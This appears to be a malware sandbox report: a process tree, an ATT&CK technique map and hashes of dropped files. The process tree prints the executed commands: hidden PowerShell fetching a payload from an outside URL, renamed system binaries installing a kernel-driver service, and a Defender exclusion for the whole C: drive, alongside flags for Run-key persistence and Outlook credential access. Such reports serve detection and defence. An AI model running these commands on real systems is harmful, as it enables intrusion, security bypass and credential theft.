    3⤵
    PID:1192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:1820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:628
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2960
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\IqjtmitiF.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:436
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1544
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif
        9⤵
        
        PID:4600
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif
        9⤵
        
        PID:2552
        
        C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif
        9⤵
        
        PID:1856
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4540
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto
        10⤵
        Executes dropped EXE
        
        PID:324
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1372
        
        C:\Users\Public\Upha.pif
        
        C:\\Users\\Public\\Upha.pif start TrueSight
        10⤵
        Executes dropped EXE
        
        PID:3112
        
        C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4732
        
        C:\Users\Public\aken.pif
        
        C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
      - C:\Users\Public\Libraries\itimtjqI.pif
        
        C:\Users\Public\Libraries\itimtjqI.pif
        6⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:3104
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4988

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2480

C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
1⤵
- Executes dropped EXE
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:4580

C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2980

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:3232

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5040

C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:5096

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:3532

C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
1⤵
- Executes dropped EXE
PID:2928

C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
1⤵
- Executes dropped EXE
PID:1624

C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
1⤵
- Executes dropped EXE
PID:2556

C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3048

C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
1⤵
- Executes dropped EXE
PID:2044

C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4436

C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
1⤵
- Executes dropped EXE
PID:3316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
1⤵
PID:1208

C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Executes dropped EXE
PID:3492

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Executes dropped EXE
PID:560

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:2036
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 912 916 924 8192 920 896
  2⤵
  - Modifies data under HKEY_USERS
  PID:112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
7c4136a5b1e7c7690a5d1b78b7db6b6d

SHA1
457f5893bc7f8609f1f00b141139dda339905b1a

SHA256
6c18650cad9e6cfb2be793c0d67fa3358d7f7becb8ad03cf1f09562368eb0119

SHA512
a8893cf938627bf2d89a0dfaccbc975bc4a6c712a14448de40cf353f9fe2048ff696a9302a8251cf60d1ad044b7f45ea5b43b82d891e6e8b03bca7d1cb31ffe6

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.3MB

MD5
e623c1d493cdccb19cffb74e8b368486

SHA1
74ce86e31a86ea1f6f68f12c2476abe05ce264d9

SHA256
7b7f1d40b08c630155d2d1af6704a44c09eb5105b1a9650c680f7cece0bfb759

SHA512
39863e7b8eca500473a5197d00444cfa7713d5fbba2d5dd32dc399f58a86e208262fb4eaff7a410a36ef9bb6ff7952244806b583ddb9fc3ffdc853ac323e7938

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
6c8b5c3f3d93eb77b165738a1073847f

SHA1
f2a961d0dbd1e1843ca2b69e424749c42f1a24b9

SHA256
07739a833728e3a474811e333561f253796d2082a88a8c71dba2b9e210ebdc78

SHA512
f507dda53046172baa83d743ce778b486409915946cce3fe6aa9b6e920cf09dd84b49617874e3269259dc008c70b4af384e01cfdaaa8a26805046d9876eb6aae

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
e8c5abece52ee82da8ce00a0c320a5be

SHA1
451489c0aef8b4b7981a98b484b3ff4db41d38b4

SHA256
98821b5665e80cabb071acbdca7ba2e370e79177b69c819b8b3ec9874d1ee78a

SHA512
4b15dc015675b5bf2c7d84a2984460c7c161c385a4329e5cc38ebda36e971453391037d1b63b5e2be60003c709bb768505d099fe1a3a1968a0f0f250b3360bd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kt0iuykf.l0h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
1.1MB

MD5
bbc7fc385a2e1198bc272acb466a70a9

SHA1
7352a3101f8e53f694fa1af71e57bda25655ce08

SHA256
7babe42bb73034aa6b7b9007ad1a07168f3302eba34a4caff6ce9c5f081fa4f5

SHA512
033227e1678e5fb3b844e64dfc7974ad76c9ca15d585935e13f7464749feae14319cc3a4406fd79fa0dff553be9f558938d30caecf09503c8c6a4b389eb3dd58

Download Submit
C:\Users\Public\Iqjtmiti.url

Filesize
104B

MD5
32cae10344c6bfd0b1711097bbe92428

SHA1
d632075eb00a36ba48c59e78027d712fa9e81eb3

SHA256
d83185244e274e4a8e35e8866ac031f935d18c86f4ecbeb9c2bc0338855cb542

SHA512
2ac0ec913f2b4e6d4c98ac68f563bc21cbdd86e98a416089735425506c752cd88dd54a18bd3928f8da5fa5d1645189b3b967f1be776f830b4f39f8f8ae9dc662

Download Submit
C:\Users\Public\IqjtmitiF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\Iqjtmiti

Filesize
1.6MB

MD5
aedf7adf135f7f5e503af3956ddc3673

SHA1
219184bad181b9958da5066d9ad315c140e28ca7

SHA256
a94020f9f66571a2470cff40ab49a1c3df8bd979cd3c020ee173c6ac8a4459b2

SHA512
bd7e05d11a8ae8ce16c4e1e28d09a740575c4698190ed54b7b380f52b2d10b7c19e5c4de53a45520782e2a571961d67e64aa50ddfa66b80a5559218343ea55a8

Download Submit
C:\Users\Public\Libraries\Iqjtmiti.mp3

Filesize
52KB

MD5
f53fa44c7b591a2be105344790543369

SHA1
363068731e87bcee19ad5cb802e14f9248465d31

SHA256
bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c

SHA512
55b7b7cda3729598f0ea47c5c67761c2a6b3dc72189c5324f334bdf19bef6ce83218c41659ba2bc4783daa8b35a4f1d4f93ef33f667f4880258cd835a10724d9

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
55KB

MD5
3c755cf5a64b256c08f9bb552167975c

SHA1
8c81ca56b178ffd77b15f59c5332813416d976d7

SHA256
12e0795aa1408bea69bfd0a53bb74558598e71b33fc12ffec0e0ae38d39da490

SHA512
8cf0f1a368089e2e3021ce6aeb4984821429d4bb9de3d273a9d0f571a847bba3fc429b84a877afec6decf40e6b94a69d52e8eeea55e042aa9773d3540dbe6bfa

Download Submit
C:\Users\Public\Libraries\itimtjqI.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\Upha.pif

Filesize
70KB

MD5
3fb5cf71f7e7eb49790cb0e663434d80

SHA1
b4979a9f970029889713d756c3f123643dde73da

SHA256
41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9

SHA512
2b59a6d0afef765c6ca80b5738202622cfe0dffcec2092d23ad8149156b0b1dca479e2e2c8562639c97e9f335429854cad12461f2fb277207c39d12e3e308ef5

Download Submit
C:\Users\Public\aken.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\df.cmd

Filesize
1.1MB

MD5
298baf7c77327a1641678b6807c230b4

SHA1
e8fd19fcc7722c2a1644478339b3b766bb2a08dc

SHA256
8f5897f90faa79aafbcc79d2b0e69a5c4c47ca9b9b55206ec7f293baaafc3b35

SHA512
11bda296eafcdf657f0cf9bf8302fcf695a701cbff895cbbd203141be6a41693c9544fa778acd901051f271385c22d1fc87d931de0bcc02e0a9db53822155014

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
117KB

MD5
3e09a81444c29dc7f3d8d2c79af30d3a

SHA1
06f93e8995282bd5442c56f3e3b0607c702587bf

SHA256
eab451b09e71b7e508916c0445ad22ff68ccc3923e019a59208f9ed953c54240

SHA512
7aa42bd64e6d3ab3934a25ac6957d8745d2fea899fe58a47e175e9006f1aeb6c0d3f3968cde6772c88eeed97b2fd088ba9f4e150ca0bf9601167049f6801de2d

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
C:\Windows\SysWOW64\perfhost.exe

Filesize
1.1MB

MD5
994d632cfa7edf1e9212db1da8817f08

SHA1
300d72f0d049c522d930692231c0da93fa4ac747

SHA256
cd9d740cbd28d54265ab2a9fc87588dd8689d762b132f517e5826eaaea89fb14

SHA512
b74d991d88aaf33210428ccb5029f8f1790b2f9c1717485aace1b55a5d670c64acb1b580f29051fd309aa1d19afb92c1fb9563cb9ea895c9d4187dd408642dcd

Download Submit
C:\Windows\System32\AgentService.exe

Filesize
1.7MB

MD5
4781873a78495dae9a5e9036b3e123c6

SHA1
8f2b78edca02fd8d4c1f2c915177bb5f874dcc17

SHA256
c3a7e0926aa07d980f17c0a21526a4bb588aa9702e6fc66b5f5ef7c75438a456

SHA512
4a8bbf308042507802a1c04519326d05b0bdda5136ba162b37ecfeb70223d15f718a71ade01a6eb289cc6e5f8e5db17c4c58de9aa7b52d68ec3f69ea2c39d713

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
1.2MB

MD5
47311f8d2dea79dce3ae79c457de7f65

SHA1
77e6f9c7f7e799f041f0f8370158cc91ae305ab6

SHA256
d0f20ea3aba0a140fedd4579a10d0e3b8d1d4af5b327ffa6e61391afcc494449

SHA512
9b3b446314d5467eab1f71e53b121258f5e1e3637fe59d4f32a36811ccfde243e9cd765cf48375af0211c26e009eba99d622417295a0bf387d5579fd0bd2b845

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
b9728a570ba30ba4050968acfcb44b98

SHA1
22c0c4c6133a1fcb1486142ebfaaa2058d29de6b

SHA256
74c7eeb2b6c48c1ff34e85d5b8302c0a9e3cc422d600cbedcfde6facfcbcaefd

SHA512
8ad6c0f792cfc2642de75e0a70d63560ecb8c386ee96ecd6c7beff7e61e7e0a98e02bd799a106519701762b6f43791f6b2eec5118aa434b05a99ea8df4799d68

Download Submit
C:\Windows\System32\Locator.exe

Filesize
1.1MB

MD5
7be45463a2cb89b83b4077bdd5dcd932

SHA1
34ee08879f943f211b87ed0922f81363c0955297

SHA256
87ac23ea43dfa47ec1db0ee3a402547769b38dcc7f545eb9ae225615a024d8d6

SHA512
e07125875fa34f13890233abce61c2c850e5c2f25b8cd4a7db2a5a30d2eb45a202701a79173db28cd08e94e9db5c8709679428b805b68975d2749b8a5aaf0187

Download Submit
C:\Windows\System32\OpenSSH\ssh-agent.exe

Filesize
1.4MB

MD5
9a725858edacf36f988c87454cdd3d4b

SHA1
ee8ef616a5bf5050eb15853a6896cbefdf47a8c9

SHA256
1333ef728090aab7bf09edcf0d24a489526ba9848bfbe97c111b4fca0068c739

SHA512
b72de2c4daaaf0a14314bf2d1188559f6f733f33be825519dfe98f182e3e73844cc199033f3233acfa7646e4dcd7d894c6ffba0c9f53e80b47ffc91c507998e9

Download Submit
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Filesize
1.2MB

MD5
1e8ff5d52cbcca652d64a28d39adbbc2

SHA1
b1721f08d685b785c97fb15430b8daff15a2b5d6

SHA256
ed9c257a7686616e75c0b8b1bbca6ca520e9c2ee420d979fa5e371aeef2997e5

SHA512
b113326d38d741006f02c7d51e713e7f480af633e19972a4d0de38175565954fdee34c5f11f6a7dae394e0b822c3612cb5d9687768c1dea9864052cc0231c7e9

Download Submit
C:\Windows\System32\SearchIndexer.exe

Filesize
1.4MB

MD5
fdada807c29716c3d488fff7ab4e2b92

SHA1
a4b7074df316c28ab42dd8dd66d2a1f3a782c7e4

SHA256
efc0347a7ce8f3671d9bee1819290bb486e38a1247539363ea137c37d52f1396

SHA512
626d606afd0d31e359ad224efbbeead0925bbc964691c2f578b11ed31ae0b1ab98997ee0b4ad8a762301b8d6dbf1543d400aa677113f6dfc423efca31d901755

Download Submit
C:\Windows\System32\SensorDataService.exe

Filesize
1.8MB

MD5
38fd7d182d9d1f653843497c0d6f47bb

SHA1
34f0b07e998da410ba5f70c8a0dfc67561693993

SHA256
c41d72b3a488f56fc8d2693c7e7002520cf781c60233bad2653b355ad4621739

SHA512
7d26b7372097b528222cbe27a4c88eea28bac823d9463b046b8981bce35b26ebfa01c99a668cb316dde86f394af97c7ab6b00f894e068a8eb4ead1a57f93b070

Download Submit
C:\Windows\System32\Spectrum.exe

Filesize
1.4MB

MD5
9f0d55d0c7ff821921f0081dea648832

SHA1
cd83daf2f5f818189a86655a15e710f92e154354

SHA256
a7a6d6ed711920f39cf8b7fd335593291f5bcf296c361adc249952c7c4ce094d

SHA512
c8272fd9b12e9ed83ecde0cd4ec77fa26d6a3e1dd84697b1315bb1f125dad6a654ad8110dffbb5368bddc3a130c50f7284ee07ebc9b6ebe452ae3e148b2a6807

Download Submit
C:\Windows\System32\TieringEngineService.exe

Filesize
1.4MB

MD5
0f23e24047fbf87ab68582afd7f04f73

SHA1
8bf6d98abeacaaff6fb138aedd1c811fbddc9bc0

SHA256
20d36a00aa628c48d55e65527e3dfb952836c6cbf5a3c3a98a2aa4e01ff6b8b0

SHA512
8fe8885685f6e3bed61183f0ca73de37a9dc086ce006f5c2b04ecfe722a81fad7db4b5de893477face2ef7c1b01a5e719764a70a45c141ec2654738d88c257b0

Download Submit
C:\Windows\System32\VSSVC.exe

Filesize
2.0MB

MD5
bdf6254ff8d68a303e25cb67a557569a

SHA1
e90282e81d8e3f7caebb00f096ffc80557970b61

SHA256
45cca06c40936014be39162878c4a4b4aba30646e0f1bac0fdc11b7b913263ad

SHA512
e2d126b6208069a56207aa4a014a960a20d0235cc8c55b7513b3e6eb277bbaa4d742eb4e20770c7b6ad1fabfbcbcffb61d2ea3763c9b3a86848497ffb337d1fe

Download Submit
C:\Windows\System32\alg.exe

Filesize
1.2MB

MD5
d4266536eeebca38ae463b64d7562e97

SHA1
9f343e6348a4d77514c85adff38c889fedc2ec38

SHA256
3333633725518d611a613da1474f852fb51cd5214376ca79896ce948aabadd19

SHA512
775613565a7a5c472cc704ce909daae75ba19ac77e1721c04cd7d7f21ea6ef86ee973892058ea92f98aa0315b2f28b2d7be9d0020e524af372f92b40cf2fd768

Download Submit
C:\Windows\System32\msdtc.exe

Filesize
1.2MB

MD5
d40de7137b114a6e58d41c854e795407

SHA1
8377de06e55c9e171a9d1b831e5a107d184c676f

SHA256
709e30fc7204f91ed02d043c4abfab6accf4a1bab05f296b196a1a73966f427d

SHA512
a6ff9bf58886c4447eefeeca02588c8db2530129d9e13e88f9cf8472da0baf86aaacac71a7fb51fdb07cc5727ff400f5df7c07352596a3864815ef2d049ce85d

Download Submit
C:\Windows\System32\snmptrap.exe

Filesize
1.1MB

MD5
eb84d31aac6798eb77468f18d347b754

SHA1
a96cedb330077522f5f60b2c2d51b8f423ab52f2

SHA256
b6c3b34f23cae14449610732c9e878f648fb8d438165c0e18063f2949dfaf3a6

SHA512
6c32bb6d84b9e4df674365d122e7de84e14626b7b70a563590290c96e7b2dcbf998ce692a56522f2c687517f28b2f7bfac6ab35224a9713de3cbefdbe7cf3978

Download Submit
C:\Windows\System32\vds.exe

Filesize
1.3MB

MD5
13dbb9a3da5c5680145c2bea2a5a2d6a

SHA1
f97fa2aff37fb23430bd91e9c3c5ca1a2759fe7a

SHA256
6f236d79f236376fc1ae91b6c4cc392f9bbde6648249a6944e656618efdb56de

SHA512
227af4678086623520554f55aba3065c47bfb60db5b82ea0a614c43e71d67a28e2ab7187354450075948cb40cdf9ea7cc493db6a817de5967b46aefb79c77cf8

Download Submit
C:\Windows\System32\wbem\WmiApSrv.exe

Filesize
1.3MB

MD5
dd7adc46bf903b697c0e3a82c76b0efb

SHA1
35e4d24afce7d00602e7cf3365167d1929c16dec

SHA256
